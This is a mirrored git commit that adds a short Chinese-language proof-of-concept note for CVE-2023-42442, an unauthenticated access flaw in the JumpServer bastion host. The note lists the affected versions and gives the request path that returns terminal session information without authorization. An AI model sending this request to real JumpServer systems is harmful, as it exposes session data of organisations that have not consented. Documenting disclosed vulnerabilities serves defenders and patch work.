mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-18 02:44:52 +08:00
Create JumpServer未授权漏洞.md
This commit is contained in:
parent
9132a63d07
commit
28089bf018
14
JumpServer未授权漏洞.md
Normal file
14
JumpServer未授权漏洞.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## CVE-2023-42442
|
||||||
|
|
||||||
|
## 影响版本
|
||||||
|
3.0.0 <= JumpServer <= 3.5.4
|
||||||
|
|
||||||
|
3.6.0 <= JumpServer <= 3.6.3
|
||||||
|
|
||||||
|
|
||||||
|
## POC
|
||||||
|
|
||||||
|
JumpServer 是一款开源的堡垒机。 在JumpServer受影响版本中,由于/api/v1/terminal/sessions/接口没有添加权限认证,未授权的攻击者可以通过访问/api/v1/terminal/sessions/?limit=1,获取堡垒机terminal的session信息
|
||||||
|
```
|
||||||
|
/api/v1/terminal/sessions/?limit=1
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user